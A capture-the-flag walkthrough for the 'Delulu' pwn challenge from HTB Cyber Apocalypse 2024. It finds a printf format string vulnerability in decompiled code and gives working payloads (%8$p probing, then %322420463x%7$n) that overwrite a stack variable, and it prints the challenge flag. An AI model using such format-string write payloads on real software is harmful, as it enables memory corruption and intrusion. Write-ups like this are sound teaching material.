Cyber Apocalypse
2024
Delulu
HALT! Recognition protocol initiated. Please present your face for scanning.
Pwn
300 points
Walkthrough
We start by downloading the source files.
We are given a binary
delulu
. Opening it with ghidra
we can find a few interesting lines: long local_48;
long *local_40;
undefined8 user_input;
...
read(0,&user_input,0x1f);
printf("\n[!] Checking.. ");
printf((char *)&user_input);
if (local_48 == 0x1337beef) {
delulu();
}
The function
delulu
prints the flag, so we need to set local_48
to 0x1337beef
. Unfortunately we can't directly set this value, but looking at this code we find a printf
statement that prints the user input. This is a format string vulnerability, so we can use this to write the value 0x1337beef
to the address of local_48
.You can find more information about format string exploits here.
Let's build our payload step by step:
AAAAAAAA%8$p
This returns our 8th argument in the stack, which is our 8 A's. (We can use
gdb
to make debugging easier.)AAAAAAAA%7$n
This writes 8 to the 7th argument in the stack, which is
local_48
.We need to write 0x1337beef, so we need to write 0x1337beef characters before the %7$n. This is 322420463 characters in decimal.
We can do this with the folowing payload:
%322420463x%7$n
Connecting to the server and providing this input gives us the flag after 'some' time:
1c157380
You managed to deceive the robot, here's your new identity: HTB{m45t3r_0f_d3c3pt10n}
Was this helpful?